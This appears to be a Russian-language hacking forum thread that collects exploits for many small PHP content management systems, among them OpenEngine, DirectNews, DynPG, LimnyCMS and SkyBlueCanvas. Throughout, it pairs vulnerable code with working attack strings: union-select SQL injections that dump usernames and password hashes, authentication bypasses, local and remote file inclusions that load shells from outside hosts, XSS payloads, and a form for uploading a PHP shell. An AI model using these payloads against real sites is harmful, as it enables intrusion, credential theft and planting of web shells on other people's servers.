Product: OpenEngine
Author: http://www.openengine.de/html/pages/de/index.htm
Version: 1.9.1

SQL-inj

/* нужны права администратора */
file: system/03_admin/ajax/index.php


$page_path_new = $_POST["path"];
$query = "SELECT * FROM ".$db_praefix."page WHERE page_path = '$page_path_new'";
$result = mysql_query($query);
echo mysql_num_rows($result);


target: {POST} ?path=1'+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,3,40,41,42,43,44,45,46/*

MachCMS 1.0
Web site : http://machcms.sourceforge.net
Version : 1.0
Author : Arthur Wiebe


[Local File Inclusion]

Vuln file: classes/Template.php [str:61]

if (file_exists("pages/$page.page/main.php")) {
$template = $this;
require_once("pages/$page.page/main.php");
$this->parse();
}
Exploit:
if magic_quotes = OFF

http://[host]/[path]/index.php?q=../../../../../../../../[local_file]%00
© RulleR aka Pin4eG

Product: DirectNews
Author: http://www.direct-news.fr/
Version: 4.10


RFI

Необходимо для правильной работы RFI! register_globals = ON and allow_url_open = ON!

file: /admin/menu.php

if (empty($from_inc))
{
header('HTTP/1.1 403 Forbidden');
$rootpath = '..';
require_once ($rootpath .'/templates/error/HTTP_FORBIDDEN.php');
die();
}
include_once $rootpath .'/library/lib.menu.php';
include_once $rootpath .'/modules/menu/lib/treemenu.inc.php';

target:?from_inc=1&rootpath=http://yousite.ru/shellcode.txt?

file: /admin/menu_xml.php

include_once $rootpath .'/library/lib.menu.php';
include_once $rootpath .'/modules/menu/lib/treemenu.inc.php';

target:?rootpath=http://yousite.ru/shellcode.txt?

file: /inc.php

if (empty($from_inc))
{
header('HTTP/1.1 403 Forbidden');
$rootpath = '../..';
require_once ('../../templates/error/HTTP_FORBIDDEN.php');
die();
}

include_once $rootpath .'/modules/menu/lib/PHPLIB.php';
include_once $rootpath .'/modules/menu/lib/layersmenu-common.inc.php';
include_once $rootpath .'/library/lib.menu.php';

Как видно,проверяеться наличие конфига,и только после - инклуд.Заинклудить из http:// неполучиться,зато file_exists(); отлично работает с ftp :)
target:?rootpath=ftp://user:password@yaouftp.ru/shellcode.txt?

file: /modules/menu/menu_layer.php

if (empty($from_inc))
{
header('HTTP/1.1 403 Forbidden');
$rootpath = '../..';
require_once ('../../templates/error/HTTP_FORBIDDEN.php');
die();
}

include_once $rootpath .'/modules/menu/lib/PHPLIB.php';
include_once $rootpath .'/modules/menu/lib/layersmenu-common.inc.php';
include_once $rootpath .'/library/lib.menu.php';

Тут попроще.
target:?from_inc=3&rootpath=http://yousite.ru/shellcode.txt?


file: /admin/inc.php

i$from_inc = true;

header("Content-Type: text/html; charset=utf-8");

if (!file_exists($rootpath .'/config.php')) {
header('Location: '. $adminroot .'/install/');
die();
}

// Compatibilite entre les versions de PHP
require_once $rootpath .'/library/lib.compatibility.php';

// gestion de session
require_once $rootpath .'/library/class.config.php';
require_once $rootpath .'/modules/panier/class.panier_article.php';

Как видно,проверяеться наличие конфига,и только после - инклуд.Заинклудить из http:// неполучиться,зато file_exists(); отлично работает с ftp :)
target:?rootpath=ftp://user:password@yaouftp.ru/shellcode.txt?

Blind SQL-inj

file: /index.php

if (isset($_GET['lang']))
{
$_SESSION[DN_UID]['lg'] = $_GET['lang'];
}
else
{
$_SESSION[DN_UID]['lg'] = $_GET['lg'];
}

$lg = $_SESSION[DN_UID]['lg'];

$requete = 'SELECT code
FROM '. $name_table_language .'
WHERE code = "'. $lg .'"
AND site = "1"';
$resultat = mysql_query($requete);


target:В таблие 7 полей ?lang=1'+union+select+1,2,3,4,5,7/*

file: /modules/ajax/remote.php

if (isset($_POST['ajax']))
{
switch ($_POST['ajax'])
{
case 'showComments' :
print(showComments($_POST));
break;
case 'postComment' :
print(postComment($_POST));
break;
default : print(true);
break;
}
}
/Функция/
function postComment($post)
{
global $rootpath, $lg, $name_table_commentaires;

if (!empty($post['noMessage']))
{
$author = !empty($post['author']) ? $post['author'] : '';
$email = !empty($post['email']) ? $post['email'] : '';
$url = !empty($post['url']) ? $post['url'] : '';
$text_comment = !empty($post['text_comment']) ? $post['text_comment'] : '';

$tri = getSqlValue('SELECT MAX(tri) + 1 FROM '. $name_table_commentaires .' WHERE noMessage = '. $post['noMessage']);


target:9 columns

Product: OpenEngine
Author: http://www.openengine.de/html/pages/de/index.htm
Version: 1.9.1

SQL-inj

/* нужны права администратора */
file: system/03_admin/ajax/index.php


$page_path_new = $_POST["path"];
$query = "SELECT * FROM ".$db_praefix."page WHERE page_path = '$page_path_new'";
$result = mysql_query($query);
echo mysql_num_rows($result);


target: {POST} ?path=1'+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,3,40,41,42,43,44,45,46/*

SQL Injection

Vuln file: system/02_page/includes/admin.php [str:368]
$query = "SELECT * FROM ".$db_praefix."page WHERE (page_path = '$page_path') AND (page_status <= ".$account_status.") $access";
$result = mysql_query($query);
Exploit:
------------------------------------------------------------------------
http://[host]/cms/website.php?id=xek')+union+select+null,null,null,n ull,null,null,null,null,null,null,null,null,null,c oncat_ws(0x3a,account_email,account_password),null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null+from+oe_account+where+account_group=2+--+
------------------------------------------------------------------------
*вывод в title
Интересная инъекция, далее показано что еще можно из нее выжать (:

LFI

Vuln file: system/02_page/includes/lang.php [str:48]$query = "SELECT lang_short from ".$db_praefix."language order by lang_short";
$result = mysql_query($query);
closeDB($link);
while ($row = mysql_fetch_array($result))
{
$lang_list .= $row["lang_short"].",";
}
if (strlen($lang_list) > 0)
{
$lang_list = substr($lang_list,0,strlen($lang_list)-1);
}
if (isset($_GET["admin"]))
{
include("system/00_settings/language_packs/lang_".$lang_admin.".php");
}
else
{
include("system/00_settings/language_packs/lang_".$lang_input.".php");
}
Exploit:
------------------------------------------------------------------------
http://[host]/cms/website.php?id=xek')+union+select+null,null,null,n ull,'/../../../../../[local_file]%00',null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null+--+
------------------------------------------------------------------------

Чтение произвольных файлов

Vuln file: system/02_page/start.php [str:52]
$fp = fopen($incurl.$page["page_include"], "r");
if ($fp)
{
while(!feof($fp))
{
$content .= fread($fp,"10000");
}
fclose($fp);
}
echo $content;
Exploit:
------------------------------------------------------------------------
http://[host]/cms/website.php?id=xek')+union+select+null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,'../../../[local_file]',null,null,null,null,null,null,null+--+
------------------------------------------------------------------------
Для успешной эксплуатации необходимо:
magic quotes = OFF

Извини что не множно подпорчу работу твою,но LFI в том файле нет.Ну точнее есть,но оно невозможно.Ибо:
closeDB($link); - выдаст ошибку,как Ундефинид функцион и скрипт прекращает свою работу.
смотрим фаил website.phpdefine("_ISLOADED",1);
if (file_exists("_config/config.php"))
{
require("_config/config.php");
}
else
{
die("openEngine ERROR: Choose <a href='system/setup/index.php'>Installation</a> or check your current system");
}
require("system/00_settings/start.php");
if ($site_encoding != "noencoding")
{
header('content-type: text/html; charset='.$site_encoding);
}
require("system/01_user/start.php");
require("system/02_page/start.php");
if (isAdmin())
{
require("system/03_admin/start.php");
}
require("system/00_settings/end.php");
?>видим что инклудится фаил system/00_settings/start.php, смотрим start.php:require("system/00_settings/includes/database.php");
require("system/00_settings/includes/settings.php");смотрим database.php:function closeDB($link)
{
mysql_close($link);
}и почему closeDB() будет ундефинид функцион? ;)

ты бы проверил на локалхосте, все прекрасно инклудится...

Symphony CMS 2.0.6
Web site : http://symphony-cms.com
Version : 2.0.6

[Local File Inclusion]

Vuln file: index.php [str:9]
function renderer($mode='frontend'){
require_once(CORE . "/class.{$mode}.php");
return ($mode == 'administration' ? Administration::instance() : Frontend::instance());
}

$renderer = (isset($_GET['mode']) ? strtolower($_GET['mode']) : 'frontend');
$output = renderer($renderer)->display(getCurrentPage());Exploit:
if magic_quotes = OFF

http://[host]/[path]/index.php?mode=/../../../../../../[local_file]%00

BareNuked CMS v. 1.1.0
CMS = BareNuked CMS

SQL injection
url - http://localhost/index.php?term=
Exploit -
http://localhost/index.php?term=1'/**/and/**/1=0/**/union/**/all/**/select/**/0,concat(0x76657273696f6e0d0a,0x3a,version()),0,0, 2,0,0,0,0,0,0,0--+&search=search
Passive XSS
search ===> "><script>alert();</script>
or
Exploit -
http://localhost/?term="><script>alert();</script>&search=search

NooMS

Passive XSS
Exploit -
http://localhost/search.php?q="><script>alert();</script>
SQL injection in admin panel
Exploit
http://localhost/admin.php?op=comments&action=listarticles&section_id=1/**/and/**/1=0/**/union/**/all/**/select/**/1,concat_ws(char(42,42,42),user(),database(),versi on()),3,4,5,6,7,8,9

Product: ReloadCMS
Author: http://reloadcms.com/
Version: 1.2.7

LFI

file: rss.php

if(!empty($_GET['m']) && !empty($system->config['enable_rss']) && !empty($system->feeds[$_GET['m']])){
$module = $_GET['m'];
header('Content-Type: text/xml');
$feed = new rss_feed($system->config['title'] . ' - ' . $system->feeds[$module][0], $system->url, $system->feeds[$module][1], $system->config['encoding'], $system->config['language'], $system->config['copyright']);
$m = (!empty($system->feeds[$module][2])) ? $system->feeds[$module][2] : $module;
if(is_readable(MODULES_PATH . $m . '/rss.php')) include(MODULES_PATH . $m . '/rss.php');


target: ?m=../../config/config.ini%00

Product: PicoFlatCMS
Version: 0.6.1
Exploit:
http://localhost/index.php?pagina=[file]

Product: Ariadne CMS
Author: http://www.ariadne-cms.org/
Version: 2.6.1
RFI

Need: register_globals = ON and allow_url_include = ON

file: /winges/tree/root.php

if (!isset($layout) || (!$layout)) {
$layout="./frames.js";
} else {
$layout=ereg_replace("[\./\\]","",$layout).".js";
}
include($layout);

По сути есть фильтр,но Ctacok научил юзать data://, поэтому обход прост.
target: ?layout=data:,<?php include $_GET[hello] ?>&hello=http://yousite.com/shell.txt?

^^ еще версия PHP >= 5.2.0
и не allow_url_open, а allow_url_include

Product - ZAKRZAK
Version - 0.01
Active XSS
Url - http://localhost/index.php?page=gbook
Exploit
'"/><script>alert("xss");</script>
Раскрытые Пути
http://localhost/index.php?page=settings&part[]=

ClanTiger CMS
Web site : http://www.clantiger.com
Vesrion : 1.0<=1.1.3

[Local File Inclusion]

Vuln file: functions/class.language.php [str:73]
if(isset($_GET['lang']))
{
$selectedLanguage = $_GET['lang'];
}
else if($_COOKIE['lang'])
{
$selectedLanguage = $_COOKIE['lang'];
}
else
{
// resort to default
$selectedLanguage = $settings['language'];
}

// see whether the language exists
if(!in_array($selectedLanguage,$this->validLanguages,true))
{
$this->selectedLanguage = $this->validLanguages[$settings['language']];
}
else
{
$this->selectedLanguage = $this->validLanguages[$selectedLanguage];
}


// attempt to load in the translations file
if(!@include_once(ROOTPATH . 'language/' . strtolower($selectedLanguage) . '.php'))
Exploit #1:http://[host]/[path]/index.php?lang=../../../../../../../[local_file]%00Exploit #2:GET http://[host]/[path]/index.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: [host]
Content-Length: 59
Connection: Close
Cookie: lang=../../../../../../../[local_file]%00Для успешной эксплуатации необходимо:
magic quotes = OFF

DynPG CMS 4.0.0
Web site : http://www.dynpg.org
Vesrion : 4.0.0

[Remote File Inclusion]

Vuln file: counter.php [str:15]
$inc = empty($_GET["inc"]) ? 0 : $_GET["inc"];

if ( !empty($inc) ) {
# Aufruf des Counters ьber einen Link. $inc enthдlt dann die Datenbankkennung!

$inc_or = htmlentities(urldecode($inc));
$inc_head = urldecode(str_replace('&amp;', '&', $inc));
$inc = addslashes(strtolower($inc));

if ( empty($GLOBALS["DefineRootToTool"]) ) {
$GLOBALS["DefineRootToTool"] = "";
}

require_once $GLOBALS["DefineRootToTool"]."config.php";
Exploit:
if register_globals = ON && allow_url_include = ONhttp://[host]/[path]/counter.php?inc=1&DefineRootToTool=[shell]?

[Local File Inclusion]

Vuln file: languages.inc.php [str:5]
global $lang_dpg;

require_once dirname(__FILE__) . '/plugins/languages.php';
require_once dirname(__FILE__) . '/localised/dynpg_backend/'.strtolower($_SESSION["LANGUAGE"]).'.lang.php';
Exploit:
if register_globals = ON && magic_quotes = OFFhttp://[host]/[path]/languages.inc.php?_SESSION[LANGUAGE]=../../../../../../../../[local_file]%00

Программа: MySmartBB 1.1.0
Сайт: mysmartbb.com
Описание уязвимости: возможен обход авторизации
Уязвимый код login.php:

$password = md5($_POST['T2']);
$check = $DB->sql_query("SELECT * FROM MySBB_member WHERE username='" . $_POST['T1'] . "' AND password='" . $password . "'");
$num = $DB->sql_num_rows($check);

эксплойт:

login: 'or+5=5#
password: asdfg

если версия MySQL = 5 то можно вывести данные из бд таким POST запросом:

T1='+and+1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((select+concat_ws(0x3a,username,passwor d,email)+from+mysbb_member+limit+1),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((select+concat_ws(0x3a,username,passwor d,email)+from+mysbb_member+limit+1),14)e)b)a)+--+&T2=1233&B1=%E3%E6%C7%DD%DE

AmiroCMS-Free-5.4.4.0
Раскрытие путей

http://localhost:7777/eshop_final.php

Fatal error: main() [function.require]: Failed opening required '_shared/code/includes/eshop_final.php' (include_path='.;/usr/local/php/PEAR') in C:\WebServers\home\localhost\www\AmiroCMS\home\loc alhost\www\eshop_final.php on line 4

http://localhost:7777/unattened.old.php

Parse error: syntax error, unexpected T_STRING in C:\WebServers\home\localhost\www\AmiroCMS\home\loc alhost\www\unattened.old.php on line 4
Уязвимую часть кода к сожалению не смогу показать,зазендено,потом выложу,когда раззендю;)

Nazep
Product - Nazep
Version - 0.1.4.3

SQL injection
http://localhost/index/index.php?sec=-1'/**/union/**/all/**/select/**/version()/*
вывод
<title></title>

Admin Panel
http://localhost/admon/index.php

Login
login - 'or+1=1#
pass - 123456

Moscuito CMS (all vers) - блоговый движок на файлах.
PHPSELF XSS: http://localhost/mosquito/%3E%3Cscript%3Ealert()%3C/script%3E
Заливка шелла: Админцентр (дефолтный пароль - pass)-> Новый (плагин) -> <?php include('http://site.com/sh.txt'); ?>

Arcadem Pro CMS [2.7]
xss пассивная:
[localhost]/index.php?cat="><script>alert();</script>
xss пассивная:
[localhost]/index.php?article="><script>alert();</script>
xss активная:
При регистрации, в поле "Логин" вписываем "><script>alert();</script>, регистрирумся. При просмотре игроков, статистики и т.д. будет выполняться ваш код.
xss активная:
[localhost]/index.php?loadpage=./includes/articleblock.php&articlecat=[number]
в строке поле комментария вводим "><script>alert();</script> и отправляем. При просмотре комментариев выполнится ваш код.
Blind SQL injection:
[localhost]/index.php?article=[number]+and+ascii(substring(version(),19,1))+--+Bb0y
уязвимый код: $articleid = $_GET['article'];

if (is_numeric(intval($articleid)) == TRUE) {
$sql = "SELECT * FROM AMCMS_articles WHERE articlekey=$articleid LIMIT 1;";

Direct News, основная часть выше,изза переноса сообщения раззлетелись :)
RFI

Необходимо для правильной работы RFI! register_globals = ON and allow_url_open = ON!

file: /admin/inc.php

$from_inc = true;

header("Content-Type: text/html; charset=utf-8");

if (!file_exists($rootpath .'/config.php')) {
header('Location: '. $adminroot .'/install/');
die();
}

// Compatibilite entre les versions de PHP
require_once $rootpath .'/library/lib.compatibility.php';

// gestion de session
require_once $rootpath .'/library/class.config.php';
require_once $rootpath .'/modules/panier/class.panier_article.php';
....

target:admin/inc.php?rootpath=http://yousite.ru/shellcode.txt?

webCocoon's simpleCMS
Web site : http://webcocoon.wordpress.com
Version : 0.7.0

SQL Injection

Vuln file: /content/post/show.php [str:3]

//Show post
$get_post = mysql_query("SELECT*FROM post WHERE post_id = '$id' AND status = 'published'");
$post_result = mysql_num_rows($get_post);
$post = mysql_fetch_array($get_post);
Exploit:
if magic_quotes = OFFPOST http://[host]/[path]/index.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

id=xek' union select null,concat_ws(0x3a,username,password),null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null from user -- &mode=post&gfile=show*так же уязвимы параметры: year, month, date

Local File Inclusion

Vuln file: /templates/default/template.html [str:538]

if($mode == ""){
include"content/front/$template.php";
}
elseif($gfile == "$gfile"){
include"content/$mode/$gfile.php";
}else{
include"content/front/$template.php";
}Exploit:
if magic_quotes = OFFPOST http://[host]/[path]/index.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

mode=../../../../../../../[local_file]%00&gfile=browse

DIY CMS (Do It Yourself cms)
Web site : http://www.diy-cms.com
Version : 1.0

Blind SQL Injection

Vuln file: /modules/users/index.php [str:48]

/*...*/
if(isset($diy->get['morder']))
{
$order = $diy->get['morder'];
}
else
{
$order = "userid";
}

if (isset($diy->get[msort]))
{
$sort = $diy->get[msort];
}
else
{
$sort = DESC;
}
/*...*/
$result = $diy->query("SELECT * FROM diy_users WHERE userid > '0' and userid != '$diy->Guestid' and activated = 'approved' ORDER BY $order $sort LIMIT $start,$upp");
/*...*/
Если версия MySQL=>5.0.12, можно получить данные из ошибки Duplicate column name
Exploit:
http://[host]/[path]/mod.php?mod=users&morder=1+and+(select+*+from+(select+*+from+(select +name_const((select+concat_ws(0x3a,username,passwo rd)+from+diy_users+where+userid=1),1)a)b+join+(sel ect+name_const((select+concat_ws(0x3a,username,pas sword)+from+diy_users+where+userid=1),1)c)d)e)*т� �к же уязвим параметр msort

там задумывался antihek system) admin/aclass/admin_func.php
...
38 function format_data($r)
39 {
40 return mysql_escape_string(stripslashes(trim($r)));
41 }
...
68 $user_name = $diy->format_data($diy->post['user_name']);
69 $user_pass = $diy->format_data(md5($diy->post['user_pass']));
70 $result = $diy->query("SELECT userid,username,password,groupid
71 FROM diy_users
72 WHERE (username ='$user_name')
73 AND (password ='$user_pass')
74 AND (groupid = 1)");
75 if (@$diy->dbnumrows($result) > 0) {
...
, но post > $user_name='=0)or('
аплоадер admin/aclass/template.php

...
410 else if ($action=="uploadtemp")
411 {
412 $upload = $diy->files["name_file"];
413 $theme = str_replace(' ','_',$diy->post[theme]);
414 $tmp_name = $upload["tmp_name"];
415
416 if (is_uploaded_file($upload['tmp_name']))
417 {
418 $path = $diy->upload_path."/".$upload['name'];
419 if(move_uploaded_file($tmp_name, $path))
420 {
...
diy-cms.com/500.php?yaneshell=1

Product: bloofoxCMS
Author: 0.3.5
Version: http://www.bloofox.com/

LFI


Need: register_globals = ON

file: update/index.php

$update_files[0] = "update_0.3.0-0.3.1.php";
$update_files[1] = "update_0.3.1-0.3.2.php";
$update_files[2] = "update_0.3.2-0.3.3.php";
$update_files[3] = "update_0.3.3-0.3.4.php";
$update_files[4] = "update_0.3.4-0.3.5.php";
....
if(isset($_GET['page']) && CheckInteger($_GET['page'])) {
$page = $_GET['page'];
$upd_var['update_file'] = SYS_WORK_DIR."/".$update_files[$page];
if(file_exists($upd_var['update_file'])) {
include_once($upd_var['update_file']);
}
}

target: Инклуд достаточно интересный,обманем скрипт :) Вроде быи переменная чекаеться на intval, и файл на существование,но вот переменная инклуда не чекаеться.Создаем не существующую переменную,и сами зададим ей значение:
?update_files[11]=../{LF}&page=11

Blind-SQL

file: plugins/text_news/text_news.php

if($login_required == 0 && $sys_explorer_vars['link_plugin'] == 31) {

// init db connection
$db2 = new DB_Tpl();

// create page handling
$sys_vars = $cont->create_pages($db2,$_GET['start'],$sys_vars);

// set template block
$tpl->set_block("template_content", "content", "content_handle");

// get sys_contents
$db2->query("SELECT * FROM ".$tbl_prefix."sys_content WHERE explorer_id = '".$cont->eid."' AND blocked = '0' ORDER BY sorting LIMIT ".$sys_vars['start'].",".$cont->limit."");
$no_of_records = $db2->num_rows();

target: ?login_required=0&sys_explorer_vars['link_plugin']=31&tbl_prefix=bfCMS_sys_user+where+id=1/*блабла,в этой таблице 13 колонок.

В дополнение к #249 (http://forum.antichat.ru/showpost.php?p=1743714&postcount=249)


Blind-SQL

file: validate.php

$username = $_GET["username"];
$password = $_GET["password"];


if(!isset($_COOKIE["deeemm"])) {

//no cookie so reset cookie just in case
setcookie ("deeemm", "", time() - 3600);

} elseif (isset($_COOKIE["deeemm"])) {

//get data from cookie
$user = explode(" ",$_COOKIE["deeemm"]);

//compare data against database
$sql_query = "SELECT * FROM `" . $db_table_prefix . "users` WHERE `user_name` = '$user[0]'";
$result = mysql_db_query($db_name, $sql_query);

target: Устанавливаем себе куку deemm со значением:
"'+union+select+1,2,3,4,5,6,7,8,9,10+--+ pew-pew"

Upload Shell

Need: register_globals = ON

file: includes/upload_file.php

if (isset($_FILES['file_data'])) {
if ($filename) {
$destination_file = $default_path . $media_dir . $filename;
echo strtolower(basename($_FILES['file_data']['name']));
}

if (file_exists($destination_file)) {
$count = 1;
while (file_exists($destination_file)) {
$filename = $count . '_' . $filename;
$destination_file = $default_path . $media_dir . $filename;
$count++;
}
}


if ($filename && !file_exists($destination_file)) {
if (!move_uploaded_file($_FILES['file_data']['tmp_name'], $destination_file)) {
echo '<br>' . "Upload failed!" . '<br>';
echo $destination_file . '<br>';
echo ($_FILES['file_data']['name']) . '<br>';
echo ($_FILES['file_data']['tmp_name']) . '<br>';
echo ($_FILES['file_data']['size']) . '<br>';
echo ($_FILES['file_data']['type']) . '<br>';
echo ($_FILES['file_data']['error']) . '<br>';
//print_r ($_FILES);
exit;
}
}
}


target: Написал Super-Exploit.

<form action="http://HOST.com/upload_file.php" method="post" enctype="multipart/form-data">
Shell file: <input type="file" name="file_data"><br>
Path: <input type="text" name="default_path"><br>
Shell name: <input type="text" name="filename"><br>
<input type="submit" value="Xek!"><br>
</form>

Вписываем например:
Path: ./
Shell name: shell.php
Xek!
Шелл окажеться в тойже папке что и upload_file.php

Qikblogger (qb-krypton-0.9beta-patched)
http://qikblogger.sourceforge.net
Blind SQL
mq=off

tag.php
if ( isset($_GET['blog_name']) && isset($_GET['tagname']) ) {
$blog_name = trim($_GET['blog_name']);
$tagname = trim($_GET['tagname']);
,,,
$post_ids = $b->get_tag_posts($tagname);

blogs.php
function get_tag_posts($tagname)
if ( $db->query("SELECT tags.post_id as ids FROM tags, posts WHERE tags.tagname='$tagname' AND tags.blog_name='$this->blog_name' AND tags.post_id=posts.post_id AND posts.disp_dt < CURRENT_TIMESTAMP() ORDER BY posts.disp_dt DESC ;") ) {


http://localhost/qb/tag.php?blog_name=barbie&tagname=barbie'+union+select+1+--+1

Product: LimnyCMS
Author: http://www.limny.org/
Version: 1.0.1

LFI

По сегодняшней традиции,оно нестрандартное,а немножно интересное :)

file: ajax.php

if(substr($_POST['page'], 0, 3) != "sub")
{
define("LANGUAGE", Language());
}
else
{
define("USER", @$_POST['user']);
define("LANGUAGE", UserLanguage(USER));
}

// SESSION
if($_POST['page'] == "contact" or $_POST['page'] == "scontact" or $_POST['page'] == "subscontact" or $_POST['page']=="registernow")
{
session_start();
}

// CAN NOT MODIFY HEADERS
if(@$_GET['page'] != "size")
{
require("languages/".LANGUAGE.".php");

Обратите внимание на установку Констант и на ф-цию UserLanguage(USER)

function UserLanguage($username)
{
if(isset($_COOKIE['ulanguage']))
{
return $_COOKIE['ulanguage'];
}
else
{
return UserSettings($username, "language");
}
}

Таким образом:
target:

POST /target/ajax.php?page=pewpew HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6
Cookie: ulanguage=../../{LOCAL_FILE}%00;
Connection: keep-alive
page=sub&user=lolita

Вуаля :)

Blind-SQL

file: cookie.php

switch($_POST['cookie'])
{
case("login");
$user=@$_POST['user'];
$pass=md5(@$_POST['pass']);
$login_result=$db->query("SELECT user, pass, ban FROM ".TABLE_PREFIX."users WHERE user='$user' AND pass='$pass'");
if($login_row=$db->fetch_array($login_result)){
if($login_row['ban']=="1"){echo "Ban!";exit;}
setcookie("username", $login_row['user'], time()+86400, '/', '', 0);
setcookie("password", $login_row['pass'], time()+86400, '/', '', 0);

Проверять можно по кукам,если обнулились - fail :o.
target: {POST} ?user=lolita'+union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,141,516,17,18,19,20,21+--+

Дополнение к посту (http://forum.antichat.ru/showpost.php?p=1775137&postcount=284) m0Hze

Local File Inclusion

Vuln file: aajax.php [str:11]
require("config.php");
require("includes/functions.php");
require("includes/class_mysql.php");
$db = new dbEngine;
$db->connect(HOSTNAME, USERNAME, PASSWORD);
$db->select(DATABASE);

define("LANGUAGE", Language());
require("languages/".LANGUAGE.".php");
/*...*/Смотрим функцию Language() (includes/functions.php)
/*...*/
function Language()
{
if(CheckLogin($_COOKIE['username'], $_COOKIE['password']) == true)
{
$language = UserOption($_COOKIE['username'], "lang");
if(isset($_COOKIE['language']) and $_COOKIE['language'] != $language)
{
/*...*/
}
return $language;
}
else
{
if(isset($_COOKIE['language']))
{
$language = $_COOKIE['language'];
}
else
{
$language = Settings("language");
}
}
return $language;
}
/*...*/
Exploit:
if magic_quotes = OFFGET http://[host]/[path]/aajax.php HTTP/1.0
Cookie: language=../../../../../../../[local_file]%00* так же уязвимы файлы: ajax.php, majax.php, print.php, uajax.php

SQL Injection

Vuln file: ajax.php [str:397]
/*...*/
$order=@$_POST['order'];
$newsgroup=@$_POST['newsgroup'];
$number=round(@$_POST['number']);
$username=@$_POST['user'];
if(!is_numeric($number) OR $number<=0){echo "<div class=\"error\">".$lang['error1']."</div>";exit;}
if($newsgroup=="all"){$ng="";}else{$ng=" newsgroup='$newsgroup' AND";}
if($order!="date"){
$lastnews_result=$db->query("SELECT id, title, pretext, datetime FROM ".TABLE_PREFIX."usernews WHERE user='$username' AND lang='".LANGUAGE."' AND$ng releasestatus='1' ORDER BY datetime DESC LIMIT $number");
}else{
/*...*/
Exploit:
if magic_quotes = OFFPOST http://[host]/[path]/ajax.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: [host]
Content-Length: 175
Cookie: language=en
Connection: Close
Pragma: no-cache

newsgroup=xek' union select null,concat_ws(0x3a,user,pass),null,null from lmn_users -- &page=newslist&number=1-------------------------------------
Limny 1.01 (Auth Bypass) SQL Injection Vulnerability (http://milw0rm.com/exploits/9281)

GEOBLOG 1.0 STABLE
http://sourceforge.net/projects/bitdamaged/
SQL

Скрипты в корне блога содержат строки:
if(!is_numeric($id)) {
print("Dont Be A h4x0r!!!");
exit();

Скрипты в админке проверяют
if($_SESSION['login'] != "user_valid_and_logged_in") {
header("Location: ../index.php");
} //End IF

admin/listcomment.php не содержит таких проверок, поэтому
$query[747] = mysql_query("SELECT * FROM geo_comment WHERE linkid='$id'");
уязвим, при
magic_quotes_gpc = Off
register_globals = On

http://localhost/geoBlog/admin/listcomment.php?id=2'+union+select+1,2,3,4,5,versi on(),7,8+--+1

Product: SkyBlueCanvas
Author: www.skybluecanvas.com
Version: 1.1

Upload-ShellCode

File: /wym/image.upload.php

if (isset($_FILES['upload']) && !empty($_FILES['upload']['name'])) {

$file = $_FILES['upload'];
$dest = $_POST['upload_dir'];
$ini = FileSystem::read_config(
"../" . SB_MANAGERS_DIR . "media/config.php"
);
$types = array();
if (isset($ini['mimes'])) {
$types = $ini['mimes'];
}

$targets = FileSystem::list_dirs(SB_MEDIA_DIR);
array_push($targets, SB_DOWNLOADS_DIR);
array_push($targets, SB_UPLOADS_DIR);
array_push($targets, ACTIVE_SKIN_DIR . "images/");

list($exitCode, $newfile) = $Core->UploadFile($file, $dest, $types, 5000000, $targets);

if ($exitCode == 1) {
$success = true;
$message = '<div class="msg-success-small"><h2>Success!</h2></div>';
}
else {
$message = '<div class="msg-error-small"><h2>An unknown error occurred</h2></div>';
}
}

Нас интересует: list($exitCode, $newfile) = $Core->UploadFile($file, $dest, $types, 5000000, $targets);

File: /include/core.php

function UploadFile($file, $dest, $allowtypes, $maxsize=5000000, $targets=array()) {
$Uploader = new Uploader($allowtypes, $targets);
return $Uploader->upload($file, $dest);
}

$Uploader->upload($file, $dest);

File: /include/uploader.php

function upload($file, $dest) {

if ($dest{strlen($dest)-1} != '/') $dest .= '/';

$fname = $file['name'];
$ftype = trim($file['type']);
$fsize = $file['size'];
$newfile = null;

if ($fsize > $this->max_size) {
$exitCode = 7;
}
else if ($fsize > $this->free_space) {
$exitCode = 8;
}
else if (!in_array($ftype, $this->types)) {
$exitCode = 4;
}
else if (!in_array($dest, $this->targets)) {
$exitCode = 4;
}
else {
$newfile = $dest.$fname;

$max = 100;
$ticker = 0;
while (file_exists($newfile) && $ticker < $max) {
$ticker++;
$bits = explode('.', $fname);
$ext = $bits[count($bits)-1];
$base = implode('.', array_slice($bits, 0, -1));
$newfile = $dest."$base.$ticker.$ext";
}

if (is_uploaded_file($file['tmp_name'])) {
$exitCode = move_uploaded_file($file['tmp_name'], $newfile);
}
else {
$exitCode = 0;
}
}
return array($exitCode, $newfile);
}

Ну вот и добрались до сути.
Target: Из-за того,что файл целевой файл(image.upload.php) просто открываеться в браузере,не происходит установки разрешеных к аплоаду расширений файлов.Так что просто отсылаем файл и POST- запрос:
upload_dir=../../
Колво ../ подъемов по ФС может быть сколько душе угодно,все зависит от настроек сервера,и где лежит сама ЦМС.В итоге заимеем шелл с названием:
Отсылали: shell.php
Получили: shell..php

Update: #244 (http://forum.antichat.ru/showpost.php?p=1727289&postcount=244)
Версия ядра обновилась.Целевая версия - 1.1.Как водиться,с обновлением, разработчики только прибавили дырок.

SQL-inj

File: downloads.php

if(isset($_GET['cat'])){
$result = mysql_query("SELECT * FROM xcms_downloads WHERE category=".$_GET['cat']." ORDER By id DESC") or die(mysql_error());
